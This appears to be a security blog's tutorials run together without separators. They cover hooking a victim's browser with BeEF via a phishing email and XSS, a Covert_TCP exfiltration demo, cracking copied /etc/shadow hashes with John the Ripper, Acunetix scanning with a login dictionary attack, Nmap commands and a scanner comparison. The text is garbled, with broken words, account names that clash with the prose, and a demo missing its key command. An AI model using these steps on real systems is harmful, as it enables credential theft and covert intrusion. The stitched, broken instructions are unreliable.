Tools

Overview

This exploit tutorial will give a brief overview of Cross-Site Scripting (XSS), and how to leverage it to control a victim’s browser. XSS is a very common web application vulnerability that many dismiss as low risk because they don’t understand what’s possible.an be used in a very subtle way to pivot into a company’s internal network by abusing a victim’s hooked browse.
Normally XSS targets a victim’s browser through the web application. So when a user visits the page, the attacker gets to run their code in the user’s browser.

Cross Site Scripting Using BEEF

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

The Attack Process

The Attack Process

This attack has an Attacker and a Victim.

The Attacker will craft a Phishing email to exploit an internal cross site scripting vulnerability.
Once exploited the Attacker can fully compromise the victim’s machines and carry out commands against that machine.
This is to prove that Cross Site Scripting is a major issue not only for the Applications themselves but for the Users that are using them.

Step 1

Find a vulnerable Web Application to Cross-Site Scripting.

For example the vulnerable parameters are:

FirstName

Last Name

Step 2

Phishing Email Crafted and sent to victim. Within this email the Sign up Here contains a crafted URL which you can see at the bottom of below image and better in Image further down.
This will take advantage of the Cross-Site Scripting Vulnerability.

This will hook the Victims browser from their machine back to the IP of the Attackers matching which is 10.10.10.99 on port 3000.

Step 3

Victim receives the email and clicks the link, now the connection is made from the victim’s machine back to the attackers without the victim knowing.
Now the Victims browser is hooked to the IP of the Attackers matching which is 10.10.10.99 on port 3000.

Once the Attacker has made this connection by exploiting the Cross-Site Scripting through a Phishing attack BEEF allows the attacker to send commands to the Victim.

Attackers Machine

As we can see the IP Address for the Attackers Machine is 10.10.10.99.

Victims Machine

As we can see the IP Address for the Victims Machine is 10.10.10.97.

The below image is the Victims machine on 10.10.10.97 is now connected to the BEEF framework running on the Attackers machine 10.10.10.99.
Once the BeEF hook is loaded in the browser you can check your BeEF controller to control the victim’s browser:

This post is to try outline the concept of what a covert channel is by carrying out a simple demo.

What is a Covert Channel?

A covert channel is described as: “any communication channel that can be exploited by a process to transfer information in a manner that violates the systems security policy.” Essentially, it is a method of communication that is not part of an actual computer system design, but can be used to transfer information to users or system processes that normally would not be allowed access to the information.

“Communication path not intended as such by system’s designers”

In the case of TCP/IP, there are a number of methods available whereby covert channels can be established and data can be surreptitiously passed between hosts.

If an attacker gains access infects the system, covered their tracks the attacker still needs to communicate out.

Covert_TCP 1.0 – Covert Channel File Transfer for Linux

Written by Craig H. Rowland (crowland@psionic.com)

Covert_TCP uses extra space in a TCP or IP header. Program a hacker uses to send a file through a firewall one byte at a time by hiding the data in the IP header.

‘This program manipulates the TCP/IP header to transfer a file one byte at a time to a destination host. This progam can act as a server and a client and can be used to conceal transmission of data inside the IP header. This is useful for bypassing firewalls from the inside, and for exporting data with innocuous looking packets that contain no data for sniffers to analyze. In other words, spy stuff.’

Demo

Open 3 terminals, the sender, the receiver and the listener.

Terminal 1

In 1 create a send directory within tmp and then a file called send.txt.

cd /tmp

mkdir send

cd send

echo "Hello" > send.txt

Terminal 2

In another terminal create a receive directory within tmp.

cd /tmp

mkdir receive

cd receive

Terminal 2

Within the receive directory (cd /tmp/receive) run the following command:

It will direct the listener to wait for the coming TCP from port 9999 going to port 8888.

With John the Ripper you provide the encrypted password files. We will combine the passwd file and the shadow file to one single file and direct John the Ripper to that file.

The passwd file store account information while the shadow contains the encrypted passwords.

It’s important to remember that after you run John the Ripper against a file to clear the John.pot file after. If not then you will get the results of previous test.

In the tutorial 2 test accounts are create called ‘Ronan’ and ‘Tester’ and both are given a password.

useradd ronan -s /sbin/nologin

passwd ronan

useradd gary -s /sbin/nologin

passwd gary

useradd brian-s /sbin/nologin

passwd brian

Once the account are created we check if the shadow password file exist.

cat /etc/passwd

It does so we can no copy the shadow and passwd file to a tmp directory.

cp /etc/passwd /tmp/passwd_copy
cp /etc/shadow /tmp/shadow_copy

Now its time to start up John the Ripper and use the unshadow script to obtain the password file.

cd /home/tools/john-1.7.2/run

./unshadow /tmp/passwd_copy /tmp/shadow_copy > /tmp/combined

To view the newly create file use the less command.

less /tmp/combined

To view the password.lst within John the Ripper we are going to use we use the less command once again.

less /home/tools/john-1.7.2/run/password.lst

Now to crack the files we run John the Ripper against our combines passwd and shadow file.

/home/tools/john-1.7.2/run/john /tmp/combined

As you see from the results above it took no time to crack the passwords for our test accounts. The final step after cracking is complete is to shred the accounts, the created files and the John.pot file.

From my experience with vulnerability scanners I would rate Acunetix as the best my favourite, followed by AppScan Standard and then AppScan Enterprise.

Acunetix has a lot more functionally which allows me to do more. Its customer support is very quick in responding and it is also the cheapest Licence out of the 3, but my opinion is only based on performance. (And no I am not a sales person for Acunetix!!).

Basic Acunetix Scan

Also possible to Select specific files once the crawl is complete incase some may be out of scope.

Fill in Target Information > Next

If the application contains a login mechanism create a new Login Sequence

Verify URL > Next

Enter the Login Credentials > Next

Verify Login was successful > Next Select any Links that are out of scope or restricted > Next

Verify Login Sequence> Finish

Add any recommendations that are needed, if none are relevant simple ignore > Finish

The scan will then commence.

Scan Results

Once the scan has complete the Scan Results will appear like so. It outlines each issue by severity of High, Medium, Low, or Informational.

Scanning Profiles

Acunetix Web Vulnerability Scanner ( WVS ) offers you the ability to choose specific types of attacks to run against a site.

Navigate to the Configuration > Scanning Profiles.

Click the ”Create a new profile” button next to the Profile drop down menu and enter a name for the new scanning profile.

Make sure that the scanning profile is selected in the Profile drop down menu and then configure the desired type of attack for the website.

Click ”Save” next to the ”Create a new profile” button to save the changes to the selected scanning profile.

Site Crawl

The Site Crawler analyses a target website and builds the site structure using the information collected, including the site’s directories and files / objects.

Specify the desired URL and Login Sequence if one is in place. Once the crawl is complete the Results will be displayed as below:Save the Scan

Crawler configuration settings can be modified by navigating to ‘Configuration >

Scan Settings > Crawling Options’. The following Site Crawler options are available:

Target Finder

The Target Finder tool in Acunetix WVS is a port scanner which can be used to discover running web servers on a given IP or within a specified range of IP’s.

To Start a scan enter a single IP or a range of IP’s to be scanned, e.g. 192.168.0.1-100. If the web servers to be scanned are listening on non default ports add the port numbers to the ‘List of Ports’ entry field.

Discovered web server/s is/are displayed in real time mode, as soon as they are discovered. The server type, hostname and server banner are also retrieved. HTTPS web servers are identified by a padlock icon.

Ping the URL to gain the IP.

HTTP Sniffer

It is possible to manually crawl your website with Acunetix WVS using a web browser. Using the resultant — and manually crawled — links, it is then possible to build a website structure that will be targeted during the security scan. This is useful for scanning specific web applications that cannot be automatically crawled due to some strange coding ambiguities.

Configure the proxy Server for the desired browser (IE) as follows:

Click Start

Open the Website in the IE Browser and the HTTP Sniffer and manually move through the Site and the Sniffer will capture all the Requests and Responses.

When finished Hit Stop

Possible to save the proxy Log

Select the location

Once saved Import Log to the Crawler.

In the Site Crawler node, click the ‘Build Structure from HTTP Sniffer log’ button (highlighted in the above screen shot) to import the captured data into the Site Crawler.

It is also possible to import HTTP Sniffer logs to an already existing scan, or import multiple HTTP Sniffer logs into the same crawl. To do so, simply tick the option “Merge the log9s0 with the currently opened crawl results in the HTTP Sniffer Log import window as highlighted below.Once the Proxy Log has been imported Select the Host > OKSelect Start and the Results will be listed as below

HTTP Fuzzer

The HTTP Fuzzer enables you to launch a series of sophisticated fuzzing tests to audit the web application’s handling of invalid and unexpected random data. The HTTP Fuzzer also allows you to easily create input rules for further testing in Acunetix Web Vulnerability Scanner.

To create a Fuzzer filter, click on the ‘Fuzzer Filters’ button in the toolbar to open the filters dialog. To use a predefined filter template, select the rule template from the dropdown list; otherwise custom filters can be created by defining the following parameters:

Rule description – A name to describe the rule

Rule Type – Select if the rule will be used to Include or Exclude the result returned because of the filter, or if it has to be logged in the ‘Activity Window’

Apply To – Indicate where to search for the matching expression, if in the HTTP response headers, body or status code

Regular expression – The regular expression or text which will be searched to match the rule.

Authentication Tester

From the Tools Explorer, select the ‘Authentication Tester’ node and in the ‘Target URL to test’ edit box and specify the target URL.

Select ‘HTML form based’ as the authentication method to be used for the attack and click on ‘Select user/password form fields to use’.

Indicate the form field that represents the username, by clicking on the field and clicking on ‘Username’ button. You have to also indicate the form field that represents the Password by clicking on the field, and clicking on the ‘Password’ button at the bottom of the window.

Acunetix must be instructed what constitutes a failed login page so the application realizes the appropriate behaviour upon successful login. Using a web browser, attempt to log in to the page to generate a login error and note down the text that indicates a login failure. Set ‘Logon has failed if’ to ‘Result contains’ and copy the text that indicates a login failure in the input text box. Regular expressions can also be specified by choosing ‘Result matches regular expression’. Click ‘Start’ to launch the dictionary attack against the web form.

Export Results

Acunetix has the capability to export results as AVDL, XML and for Imperva WAF

Reporting

Acunetix Web Vulnerability Scanner Reporter is a standalone application that allows you to generate reports for the security scans performed using Acunetix Web Vulnerability Scanner. The Reporter can be launched after completing a scan, or from Acunetix Web Vulnerability Scanner program group, and can be used to generate various types of reports including developer reports, executive reports, compliance standard reports or a report that compare the results of two scans.

Each type of report also contains its own Report Wizard to help.

Hit Generate ReportClick ‘Yes’ to import the scan into the database.

Saving a Report automatically saves as a .pre file that can only be opened within Acunetix.

Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was designed to rapidly scan single hosts and large networks.

Zenmap is the official Nmap Security Scanner GUI that aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users.

Nmap is a very powerful utility that can be used to:

Detect the live host on the network (host discovery)

Detect the open ports on the host (port discovery or enumeration)

Detect the software and the version to the respective port (service discovery)

Detect the operating system, hardware address, and the software version

Detect the vulnerability and security holes (Nmap scripts)

It is available for both the command line interface and the graphical user interface. Once the exe or ZIP file is downloaded from http://nmap.org/download.html during installation there is an option to either install NMAP as a GUI or the command line interface.

Simply deselect GUI if you wish for the command line interface, which is recommended as you are actually writing the commands yourself.

If you are a beginner then the GUI is a great place to start as it helps a lot with writing the desired commands for you as you can simply select what you wish it to do.

Once the command line version is download and installed open up the Cmd navigate to the folder like below. This is were all the command will then be carried out.

Nmap Help

nmap –help

Lists all the possible commands to help with the following;

TARGET SPECIFICATION

HOST DISCOVERY

SCAN TECHNIQUES

PORT SPECIFICATION AND SCAN ORDER

SERVICE/VERSION DETECTION

SCRIPT SCAN

OS DETECTION

TIMING AND PERFORMANCE

FIREWALL/IDS EVASION AND SPOOFING

OUTPUT

MISC

EXAMPLES

Export to File

-help is just an example this can be used for any scan.

nmap –help > C:\namp.txt

Target address URL or IP Address.

nmap Target

Results will outline the following:

Scan a number of specific ports

nmap -p80,21,23 Target

Multiple Targets

nmap -O Target1 Target2

Enable OS and version detection

Script scanning, and traceroute; -T4 for faster execution

nmap -A -T4 Target

Find if host/network is protected by a firewall

nmap -sA Target

Scan a host when protected by the firewall

nmap -PN Target

Scan a range of IP address using a wildcard

nmap 192.168.1.*

Entire subnet

nmap 192.168.1.0/24

Exclude hosts from a scan

nmap 192.168.1.0/24 –exclude 192.168.1.5

nmap 192.168.1.0/24 –exclude 192.168.1.5,192.168.1.254

Some Examples of Scans

-sS TCP SYN scan

Half-open scanning because this technique allows Nmap to get information from the remote host without the complete TCP handshake process, Nmap sends SYN packets to the destination, but it does not create any sessions, As a result, the target computer can’t create any log of the interaction because no session was initiated, making this feature an advantage of the TCP SYN scan.

onmap -sS Target

-sT (TCP connect scan)

Is the default TCP scan type when SYN scan is not an option?

Instead of writing raw packets as most other scan types do, Nmap asks the underlying operating system to establish a connection with the target machine and port by issuing the connect system call. Rather than read raw packet responses off the wire, Nmap uses this API to obtain status information on each connection attempt.

nmap -sT Target

-sU (UDP scans)

Sends a UDP packet to every targeted port and a service will respond with a UDP packet, proving that it is open. Common ports such as 53 and 161. Possibilities to speed up UDP scans up include scanning more hosts in parallel, doing a quick scan of just the popular ports first, scanning from behind the firewall, and using –host-timeout to skip slow hosts.

nmap -sU Target

Alternative to the TCP and UDP protocols, combining most characteristics of TCP and UDP, and also adding new features like multi-homing and multi-streaming.

nmap -sY Target

-sA (TCP ACK scan)

Used to map out firewall rulesets, determining whether they are stateful or not and which ports are filtered.

nmap -sA Target

-sO (IP protocol scan)

Allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.) are supported by target machines.

-sO (IP protocol scan)

Zenmap GUI Interface

Zenmap allows interactive creation of Nmap command lines by select the different point and click approach.

Running a scan is as simple as typing the target in the “Target” field, selecting the “Intense scan” profile, and clicking the “Scan” button.

Once the Target and the Profile is selected the Command text-area will outline the Nmap command that is about to be run. This command could also be copied out and used in the Nmap command line interface.

Possible to use the profile editor as an Nmap command editor. Select “New Profile or Command” from under the “Profile” menu or use the ctrl+P keyboard shortcut. The profile editor will appear, displaying whatever command was shown in the main window.

Within the Scripting Tab its possible to Scroll the list on the left to see all the scripts that are installed in the script.db, Scripts can be selected or deselected individually by clicking the check-box next to the script name.

To save the Profile 1st go to the “Profile” tab and give a name to the profile. Then click “Save Changes” to save the new profile.

The newly created Profile will then be saved and can then be selected as a scan option in future.

Conclusion

Nmap is a must have tool for Network Security Experts. It supports many of advanced techniques for mapping out networks filled with IP filters, firewalls, routers, and other obstacles. Ability to scan huge networks containing hundreds of thousands of machines and most importantly it allows for both the traditional command line and graphical (GUI) versions.

An Analysis of Automated Web Application Scanning Suites

This document is an analysis of the performance of five common web application scanners, which were put against three different types of web applications. The document will provide as an evaluation of the web application scanner suites from installation to the completion of the scan, and will rate the suites on multiple criteria.

Overall Details Regarding Each Product

Details show that overall the product AppScan is the most costly with Burp Proxy being the cheapest.

AppScan

Acunetix

Burp

Rapid7 NEXPOSE

NTO Spider

Overall Conclusion

Ongoing cyclical web application vulnerability assessments are a critical part of the software development lifecycle (SDLC) for any organization. The harried release cycles of web applications and scarce availability of skilled security engineers to conduct thorough manual assessments makes the market for automated web application vulnerability scanner suites one that will continue to grow. As more products come to market, and more exploitable vulnerabilities are identified, the choices will continue to grow. The end consumer will almost always be faced with picking a product that meets their strictest requirement, the budget. In terms of overall value, it is the conclusion of the researchers conducting the HackMIami 2013 Hackers Conference PwnOff that Portswigger BURP and Rapid7 Nexpose/MetasploitPro currently provide the most value to the independent security consultant in terms of discovered vulnerabilities, ease of use, licensing flexibility, and rage of functionality